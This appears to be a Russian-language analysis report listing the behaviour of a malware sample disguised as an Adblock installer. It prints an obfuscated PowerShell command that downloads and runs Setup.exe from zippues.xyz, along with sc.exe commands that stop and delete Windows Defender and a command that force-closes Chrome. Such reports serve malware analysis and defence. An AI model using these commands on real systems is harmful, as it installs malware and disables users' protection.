Техническая информация
- Системный антивирус (Защитник Windows)
- Средство контроля пользовательских учетных записей (UAC)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w 1 Import-Module BitsTransfer; S`TA`RT-bi`TST`RaNsF`eR -Source "('ht'+'tp://zippues.xyz/Setup.exe')" -Destination "%TEMP%\Adblock_Setup.exe"; .('cd') ${e`Nv`:TEMP}; ./Adblock_Setup.exe
- '%TEMP%\adblock_setup.exe'
- '<SYSTEM32>\sc.exe' stop windefend
- '<SYSTEM32>\sc.exe' delete windefend
- '<SYSTEM32>\taskkill.exe' /im chrome.exe /f
- %TEMP%\bit5ef1.tmp
- %TEMP%\bit5ef1.tmp
- %TEMP%\bit5ef1.tmp в %TEMP%\adblock_setup.exe
- 'zi##ues.xyz':80
- http://zi##ues.xyz/Setup.exe
- DNS ASK zi##ues.xyz
- ClassName: 'AutoHotkey' WindowName: '%TEMP%\Adblock_Setup.exe'
- ClassName: '' WindowName: ''
- '<SYSTEM32>\sc.exe' stop windefend' (со скрытым окном)
- '<SYSTEM32>\sc.exe' delete windefend' (со скрытым окном)